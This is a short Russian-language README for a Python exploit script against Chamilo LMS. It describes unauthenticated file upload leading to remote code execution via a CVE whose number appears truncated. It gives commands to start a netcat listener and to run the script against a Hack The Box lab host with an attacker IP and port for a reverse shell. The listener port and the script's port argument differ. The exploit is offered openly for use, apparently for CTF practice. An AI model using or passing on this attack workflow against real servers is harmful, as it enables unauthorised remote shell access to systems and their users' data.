
Удаленное выполнение кода для Chamilo LMS
pip install requests
Python-скрипт использует уязвимость CVE-2023-422 для загрузки файла на сервер и использует этот файл для отправки реверс-шелла в прослушиватель netcat, и всё это можно сделать без аутентификации. Однако вам нужно будет выполнить следующие шаги, чтобы успешно использовать Python-скрипт.
Запуск прослушивателя netcat:
nc -lnvp 4444
Выполнение Python-скрипта (пример):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
Пожалуйста, поставьте звезду, если следующий эксплойт был полезен :)